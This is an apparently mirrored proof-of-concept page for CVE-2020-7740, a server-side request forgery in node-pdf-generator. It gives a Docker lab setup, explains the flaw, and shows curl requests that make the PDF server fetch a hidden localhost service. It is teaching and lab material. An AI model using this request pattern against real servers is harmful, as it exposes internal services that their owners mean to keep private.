Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-7740 PoC — node-pdf-generator 输入验证错误漏洞

Source
https://github.com/CS4239-U6/node-pdf-generator-ssrf
Associated Vulnerability
Title:node-pdf-generator 输入验证错误漏洞 (CVE-2020-7740)
Description:node-pdf-generator是个人开发者的一个JavaScript编写的用于从HTML生成PDF的Web服务器。 node-pdf-generator存在安全漏洞,该漏洞源于缺乏用户输入验证和对提供给node-pdf-generator的内容的清理,攻击者可利用该漏洞可能会创建一个url,该url将被传递给允许SSRF攻击的外部服务器。
Description
An example of CVE-2020-7740
Readme
# CVE-2020-7740

This affects all versions of package [`node-pdf-generator`](https://github.com/darrenhaken/node-pdf-generator). Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.

[Source](https://nvd.nist.gov/vuln/detail/CVE-2020-7740)

## Quick start with docker

1. Build the container with
2. Run the container with `docker run -p 3000:3000 cve-2020-7740`
3. Notice that we cannot visit [`localhost:3001`](http://localhost:3001) directly
4. Send the request with curl using `curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf`
5. View `test.pdf` to view the localhost website that is supposed to be hidden.

## Quick start Without docker

1. Clone the project using `git clone {link to be inserted}`
2. Install the dependencies from `https://wkhtmltopdf.org/`
3. Start the server using `node .\NodePdfGeneratorServer` the server will be running at `localhost:3000`
4. Install the requirements of the hidden python server using `python3 -m pip install -r requirements.txt`
5. Start the hidden server using `python3 HiddenService` the server will be running at ['localhost:3001`](http://localhost:3001)

## How does it work?

1. A get request with a body is sent to the server. This can be sent using `curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf`
2. This will save a copy of the html page of `http://www.google.com` to the file `test.pdf`

## Why is it vulnerable?

1. Other URLs that is fed to the server will be visited by the server in order for it to convert the website to pdf.
2. This allows the user forge a server request by giving the server an internal IP address for it to target.

## More information on the CVE-2020-7740

1. [Vicarius.io](https://www.vicarius.io/research-center/vulnerability/cve-2020-7740-id264841)
2. [NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-7740)
3. [Original Repository](https://github.com/darrenhaken/node-pdf-generator)
File Snapshot

 [4.0K]  /data/pocs/42ea0aca73f76b85fac1d068e3a68d90deca071a
├── [ 535]  Dockerfile
├── [4.0K]  HiddenService
│   └── [ 179]  __main__.py
├── [1.0K]  LICENSE
├── [4.0K]  NodePdfGeneratorServer
│   ├── [ 211]  conf.js
│   └── [ 872]  index.js
├── [ 287]  package.json
├── [4.6K]  package-lock.json
├── [2.1K]  README.md
├── [   6]  requirements.txt
└── [  81]  start.sh

2 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.